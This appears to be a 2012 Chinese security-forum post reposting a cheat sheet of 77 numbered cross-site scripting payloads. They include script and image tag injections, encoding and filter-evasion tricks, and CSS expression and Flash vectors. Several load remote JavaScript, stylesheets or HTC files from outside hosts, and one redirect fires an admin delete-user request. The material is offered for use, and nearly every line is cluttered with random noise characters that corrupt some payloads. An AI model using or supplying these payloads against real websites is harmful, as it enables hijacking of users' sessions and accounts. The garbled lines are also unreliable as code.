貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。
3 m) \. s1 g1 e2 n! L1 h
- l \: l1 G2 C5 g) A% ^ (1)普通的XSS JavaScript注入
# Q% F( k% m. l) P L5 b' |4 ~& C <SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>) A4 i4 U- D' M J/ n: S
4 k8 b5 D! o7 n9 _8 g (2)IMG标签XSS使用JavaScript命令
8 |9 c2 Q3 b, P& J <SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
, p" A- ^9 c: V( y8 ]3 r3 U5 {1 S" H' P+ w. b
(3)IMG标签无分号无引号 S% t% K5 _* [5 R0 |+ T9 y6 y, O
<IMG SRC=javascript:alert(‘XSS’)>
`% i& r6 f( b' X, J" E% _0 O O, S& x( l6 h) y
(4)IMG标签大小写不敏感2 j7 Y# ^! G8 O7 O1 ^
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>
; }1 n# E9 e# n9 t, ^
* d0 D! J* ^+ M* M/ n/ ^6 e. d% J (5)HTML编码(必须有分号)
8 a) P6 y, w$ v1 Q3 g9 T <IMG SRC=javascript:alert(“XSS”)>
8 r8 x" }! W0 [7 c3 D0 C# ^/ ~4 v
% r3 ^: d4 h3 @/ i8 {7 q (6)修正缺陷IMG标签 d6 \* l( Z4 L8 W) r
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>& R" f9 C1 b9 X
4 \. z) w% X; j& @8 | (7)formCharCode标签(计算器)1 f# b ^4 ? X+ {2 K! c2 N
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>. D0 t& _7 t5 {7 N! G# W1 M) \
; m: Q6 F$ K& o' m- e9 y (8)UTF-8的Unicode编码(计算器)) L: l+ j$ {$ ?6 O0 K& {# _
<IMG SRC=jav..省略..S')>. B+ [% I* G- f& W$ c
: g& r: i' Q. v- n (9)7位的UTF-8的Unicode编码是没有分号的(计算器)
) p( [6 c4 l: ~$ S5 L6 O <IMG SRC=jav..省略..S')>) @# t/ d9 n0 x# B/ x" o
$ Y; c1 _5 P1 @: u4 @ (10)十六进制编码也是没有分号(计算器): w/ }( M& n: Y
<IMG SRC=java..省略..XSS')>
) a1 V6 j* Q8 X& _. G q2 w, g0 R4 z9 \) n$ G& J3 C5 \! g
(11)嵌入式标签,将Javascript分开: O0 A( R* B: B9 G
<IMG SRC=”jav ascript:alert(‘XSS’);”>
% P. F1 Q- T2 ]! N3 ^$ r9 e" D( k: c S6 j6 j2 L6 o7 V+ G
(12)嵌入式编码标签,将Javascript分开
# S$ W3 e8 k9 Y' ]) R8 {' v( k <IMG SRC=”jav ascript:alert(‘XSS’);”>8 A3 q, v3 p( o
+ H( @5 h, G) w; R# H
(13)嵌入式换行符. a& d# J7 A |+ ?8 Y) ?3 T& u
<IMG SRC=”jav ascript:alert(‘XSS’);”>
9 @; w) p' O3 h' H o" p, [4 q9 \% @. Y
(14)嵌入式回车
7 \) z. R. c- k3 c) U8 g <IMG SRC=”jav ascript:alert(‘XSS’);”>
0 t& {- Q! ]: d$ F6 W, E! C' N) z# _7 x
(15)嵌入式多行注入JavaScript,这是XSS极端的例子' u% [. W5 h. A h& g
<IMG SRC=”javascript:alert(‘XSS‘)”>2 x/ y# l& O& H) |: W0 f+ h2 @
& W! m0 h; z' n, H$ K6 n8 A$ Q+ ?% y (16)解决限制字符(要求同页面)- D1 D! J% R' E# S% Z
<script>z=’document.’</script>2 Q1 s% l3 T9 m1 ]( J' S- h
<script>z=z+’write(“‘</script>
" ]/ h- e% v. _, n/ w4 x' [( D$ e, ` <script>z=z+’<script’</script>
8 N/ F9 Z; ?/ t3 x* K <script>z=z+’ src=ht’</script>
7 l' Y7 ~7 l' t1 o" _% D <script>z=z+’tp://ww’</script>
* t! ^9 {1 k9 U+ Y5 E <script>z=z+’w.shell’</script>
9 h2 Z# M) f) {0 Q; F( R9 j <script>z=z+’.net/1.’</script>
9 @( D# U, X- n3 x# n <script>z=z+’js></sc’</script>
8 N6 \' J! H- I <script>z=z+’ript>”)’</script>
B' U4 C1 t- }4 Q8 {2 N5 y5 } <script>eval_r(z)</script>" K5 n: Q$ {* ~7 q8 Z& z6 [( J
9 k& W: {7 A% i3 {
(17)空字符- |5 U7 v" P$ Z* e+ h4 @
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
, Y( R# [1 ?9 b2 W' x. B. U* c- n) b; @& d. _1 G
(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用* N" o% p9 G' P |7 u% u: ~9 d
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out e) O) e @+ g
; s/ C5 D: ?4 k9 N6 G
(19)Spaces和meta前的IMG标签
, b5 I5 p) Z$ K% b- N+ h" ~ <IMG SRC=” � javascript:alert(‘XSS’);”>- e$ r }. R3 s$ b' _: i( Q
$ n8 c% D$ `7 X) U1 e% j5 m (20)Non-alpha-non-digit XSS
- q- s, R3 r5 Y <SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>% I& ~2 }* o+ e/ H( U
: j5 H8 j9 I$ o (21)Non-alpha-non-digit XSS to 2
1 {- m! c$ t* N4 ? <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>7 H3 i/ C4 w/ x. N9 [
' w+ B$ u: H) C1 m
(22)Non-alpha-non-digit XSS to 30 L X# n7 U$ I9 C5 P7 `2 a3 J* c
<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
% }) X" J2 l0 _
% f x6 I X3 [1 Y" \0 b (23)双开括号 s$ _! I$ n2 G0 ^ b9 D
<<SCRIPT>alert(“XSS”);//<</SCRIPT>
% V- F3 A6 A2 Q' R4 m6 r
: a1 D2 ^. t& K! ?# w: _ (24)无结束脚本标记(仅火狐等浏览器)
& F7 A9 f# @, a5 q5 L8 Y <SCRIPT SRC=http://3w.org/XSS/xss.js?<B>5 O9 d" c) M6 O1 i! L7 a
& K% w! z/ a: T9 a0 v6 C( b (25)无结束脚本标记24 E% B" b2 g! E) a; B
<SCRIPT SRC=//3w.org/XSS/xss.js>6 U& T$ S3 I8 s( M- A5 q( o
! O0 n, s' p a# V0 O. g, S
(26)半开的HTML/JavaScript XSS
V* c! `: n2 N1 z# f <IMG SRC=”javascript:alert(‘XSS’)”
; K1 o* Y6 J8 L! B7 j. U+ ~. M* e$ x+ |6 M* u! n
(27)双开角括号
9 m1 J9 @7 }$ Y7 U+ M2 o <iframe src=http://3w.org/XSS.html <( b/ P" N# T5 b+ x" m
7 ]6 a0 T I/ _ s% ?& k" p
(28)无单引号 双引号 分号( W3 C* o3 M. b1 _; K( Y8 ?# d
<SCRIPT>a=/XSS/
; Q+ v* C* {7 D0 |% e- E7 t2 U5 ?/ p alert(a.source)</SCRIPT>7 C6 A- ^" `) J$ J2 Y m( `7 C
: e5 v# b, E% P5 `+ q (29)换码过滤的JavaScript
, t% O1 j$ Q. S, \$ H+ P \”;alert(‘XSS’);//% r9 H1 i4 {) J0 H6 D c, A
, d y8 Q m" j$ V (30)结束Title标签
" O% U, F. {/ y3 g; [8 G x) _ </TITLE><SCRIPT>alert(“XSS”);</SCRIPT>0 a7 [) @2 R+ \: {! i( d
& n3 f" S0 M- B8 [' c6 b- ]9 d( C
(31)Input Image
3 t9 G8 y' V1 B: l9 F <INPUT SRC=”javascript:alert(‘XSS’);”>8 `5 X" W1 H( @3 A. F4 X0 k
! S1 z* m: g) ^+ s
(32)BODY Image& O! B d# @( o5 i1 Z S7 l$ h2 G
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>
* e0 d' A8 H& Q- }$ d( ^: |2 N) U4 _* ?2 g7 W+ ]
(33)BODY标签$ |4 t0 @6 p6 j, h
<BODY(‘XSS’)>
& u* Y P9 M/ D: x
b* K3 ~0 K, j `$ Q$ l8 [% }& f (34)IMG Dynsrc
& n( Q- B# ~+ a7 R <IMG DYNSRC=”javascript:alert(‘XSS’)”>% K( k2 r+ ]4 W$ G/ u
4 u) M5 _% r( M
(35)IMG Lowsrc
5 C* [' d0 e0 m9 T5 h <IMG LOWSRC=”javascript:alert(‘XSS’)”>
( B$ P5 J, i% D; D5 A! F; \6 C" t! ~/ D
(36)BGSOUND" T+ C& D/ l4 f
<BGSOUND SRC=”javascript:alert(‘XSS’);”>* T$ m4 @3 j9 d e& _$ E+ L+ z
6 F, s% ?; E! x* g (37)STYLE sheet
" B2 T0 \2 x, u8 E5 Q7 h( l <LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>* D$ _$ g5 p6 m' v, C- P
9 Y a6 Z6 P5 ~- e9 N7 s; v7 S) x (38)远程样式表( `& J# d# k; M- w* j( S# Y
<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>
: d% Z D" D' Y
0 E% s. @# O* Z; m1 S/ q! h7 p/ ] (39)List-style-image(列表式)( i5 G% j$ C& S+ v6 w6 ~
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS8 W- g( i8 t( ^2 X7 a" m( `2 G
9 \8 w7 x5 K7 u$ w- D (40)IMG VBscript& \4 V5 J6 z/ k- b
<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS
$ X. Q3 o* g {5 \# c+ v6 {4 m+ c' H
(41)META链接url J9 i0 m; |- [& v, b1 b
<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>
/ y. \7 N! V3 `: s# O" t, B
6 k3 m4 b6 R2 V# T5 R (42)Iframe
- ^7 M( Z. N' {; Z6 f* X: s <IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>
$ J8 b, b4 s3 z3 c* R- C: a' z e6 h/ r* y* _0 w/ G. A
(43)Frame
- W( e$ s' L' }* v' B- a <FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>
q7 Q, p$ K# W; c* `/ z
9 N# y2 O- r; s' n6 p (44)Table
9 n) ?3 D( g- P6 q; |! Q, x. k" \) k+ G <TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
# M0 J! Z$ G' p9 A- U* A/ w0 T4 O! w3 ~- b8 ]2 F2 J
(45)TD: d. h( z: X J. J
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>+ K/ z) H/ w6 k5 `1 q
) @- J. v" z0 n5 C8 S (46)DIV background-image! B1 \* P6 T6 B6 D( K- o" M$ j
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
4 ?' ^( n* J9 p+ y
2 o) I* _' J2 [ l2 m (47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)
7 h. s+ N$ ~/ M* ]6 E2 E1 R7 k E <DIV STYLE=”background-image: url(�javascript:alert(‘XSS’))”>4 \ V( \2 s$ O8 K; V/ O% N* _, j
; h; J% q$ E; U& ?7 e* ~ P" r) A (48)DIV expression3 ~9 u1 A7 S9 v
<DIV STYLE=”width: expression_r(alert(‘XSS’));”>3 H7 h! e( _5 r7 q9 @% W8 r
( p0 r9 B) x1 l& _ (49)STYLE属性分拆表达1 N5 V" c7 `$ f% Y( x4 I# O
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
+ B4 o1 {; ]0 n0 ~/ K4 q! v
. K: J+ P; s) G( k (50)匿名STYLE(组成:开角号和一个字母开头) i, g+ G0 e' q7 C9 A
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”> p# f; O' z- u) ^0 a
7 P5 u% J0 V0 ?7 D+ u (51)STYLE background-image7 u& c3 @6 w9 @& A2 J5 D
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>
' r1 O' B) ~0 L& f+ A* G0 }
7 e$ e: e1 O# v4 c (52)IMG STYLE方式
5 s3 L' v4 r( y( e' ~7 T# j exppression(alert(“XSS”))’>, p2 `1 f( e* ]# w
9 |1 T1 [: r" j0 E3 A9 w
(53)STYLE background" P; W6 z! U+ r4 P1 E1 f
<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>9 x. l! U5 }8 ?5 _( T
* q' p) w$ K( L5 V (54)BASE
8 {: ?( N0 |; _- B* v% Q; P <BASE HREF=”javascript:alert(‘XSS’);//”>
' |) j& x! |; ]& L! @+ C+ m' d
" a# `; p" x. B% V/ J, E (55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
- n, D r. b+ q, y3 a) f <EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>/ V1 D8 i: C, f; h9 A& n
6 Y; L8 t: C( n5 c, B6 L+ ]% O: a (56)在flash中使用ActionScrpt可以混进你XSS的代码
7 F8 [1 `1 g [ K* b" j, G7 t a=”get”;( f0 l* _) {; F' v* c* L/ {
b=”URL(\”";) E' s3 y4 P) x7 a. k; h. o
c=”javascript:”;) s1 H$ e8 S# ] |2 W( H5 D
d=”alert(‘XSS’);\”)”;
& N* d( q E# A) d+ `/ i2 w% J# k eval_r(a+b+c+d);3 }, Q* \; g! J+ l
- ~) u" B' }5 G2 W+ X3 q+ k& N (57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上5 x9 a. F- B n; r; ]8 Q
<HTML xmlns:xss>
B6 L0 ?, a, Z <?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>7 \' Y7 }: A! S' o; H
<xss:xss>XSS</xss:xss>
. {: j% n* l0 E5 C- R </HTML>
0 j+ B' ~9 h2 |, K
+ {+ B" k i8 H2 L. I" z, Q2 U (58)如果过滤了你的JS你可以在图片里添加JS代码来利用
7 S5 V- {; P1 B6 W. r+ H: i# P" x <SCRIPT SRC=””></SCRIPT>& n( H4 z0 A2 D+ ?$ j5 `3 E# W! S
G9 l/ y( K. T6 b( _
(59)IMG嵌入式命令,可执行任意命令2 V( G9 M* k& g! h5 ` W* | s6 h
<IMG SRC=”http://www.XXX.com/a.php?a=b”>
; W ?' z1 }6 g4 s
. [) L& R8 B' k) A) t (60)IMG嵌入式命令(a.jpg在同服务器)
1 O6 {- H! K, Z2 N2 a& m2 u5 { Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser0 Z5 m1 a- s2 N. P7 D# b
/ b: c$ _4 s+ P3 l8 Y# H1 }+ K4 | (61)绕符号过滤
# T7 J- k6 v' e4 a+ K3 v$ v <SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>
! [4 V5 K+ Y* w. ?& `" z8 |1 b' u5 w
(62)1 H0 G; o( l( }& q2 g1 [
<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>* c" D0 B6 I* i+ }$ ?" {9 u
3 Z. f4 n! \# {8 \) D8 Q
(63): ?6 P" U* V$ [/ ]' {
<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>/ M, e: A6 {* f% r" L- V
0 L+ g. l# c: [7 D6 E
(64)2 s% ~" k- |, Y
<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>% N% F0 ^' [( p! [; s
' n& ^( I. E0 S5 b: S3 D
(65)- `' E. @, h; ^4 E# g
<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>
( q8 ^3 M- e& c
: o8 {( f2 ]1 q8 X (66)
/ ~2 d9 R1 M% B; P8 F <SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>
7 P* W1 b7 j+ G5 O+ |$ j2 X+ R7 E7 R( w' R/ X
(67)
! { b3 b0 p1 w" t0 }$ \3 E; [# Q" ^ <SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”></SCRIPT>
6 y4 }: @1 @% Y' B- L; x" M& A
9 u8 R6 ]+ W6 d/ j4 k6 h! M: ^1 n (68)URL绕行
9 _9 O- @; g% d <A HREF=”http://127.0.0.1/”>XSS</A>
0 V0 _! \' e+ b) J/ |/ V) k5 }$ b6 Z4 n+ j1 D0 H
(69)URL编码6 q8 V. l+ h5 `) u
<A HREF=”http://3w.org”>XSS</A>7 u1 o7 L2 B5 M! x
4 U9 g6 D5 X7 P8 J4 l1 P+ v' y (70)IP十进制
( \' d R: A1 R% g" ] <A HREF=”http://3232235521″>XSS</A>
& r# Y8 D- V- q, R+ s! ]% O. [$ w2 H$ H. R
(71)IP十六进制
5 _. Q4 d$ [, q! a6 L5 r <A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>7 g" r0 I4 a+ n1 s, O3 s7 M+ c7 F
3 g0 ~7 u+ H& b: ?
(72)IP八进制
$ j" L) p. n4 H1 L B7 @ <A HREF=”http://0300.0250.0000.0001″>XSS</A>$ Q/ S( ^5 X8 p) P0 ~+ c
" Z6 h) d' Y% {7 ] y! l/ j9 s
(73)混合编码
$ h: T& ~# w- n5 e; Z <A HREF=”h7 F/ Q1 m, A9 i, d
tt p://6 6.000146.0×7.147/”">XSS</A>
% N* Z0 W" n$ G# R7 u a2 a+ ^1 A' W; ~
(74)节省[http:]& @2 C5 Z7 X0 S% [
<A HREF=”//www.google.com/”>XSS</A>
/ Q8 ?8 T' j2 K+ r5 v& A: p; f* _9 t& J* t) h6 u
(75)节省[www]
$ _7 J& g' U& c [! D; h/ J0 K <A HREF=”http://google.com/”>XSS</A>4 j1 i" A, ]- ^) H! `* _3 P+ \
8 q- R+ H- B- Q9 _! u) D. p (76)绝对点绝对DNS& p# y0 Y5 m+ w# L1 b4 P
<A HREF=”http://www.google.com./”>XSS</A>
& o+ c# U+ n: W/ b' _6 H8 y/ s6 z9 n& H" b/ D
(77)javascript链接 a/ j/ E% ~$ W$ T1 B3 i9 F
<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A> |
发表于 2012-9-5 14:56:34
收藏
支持
反对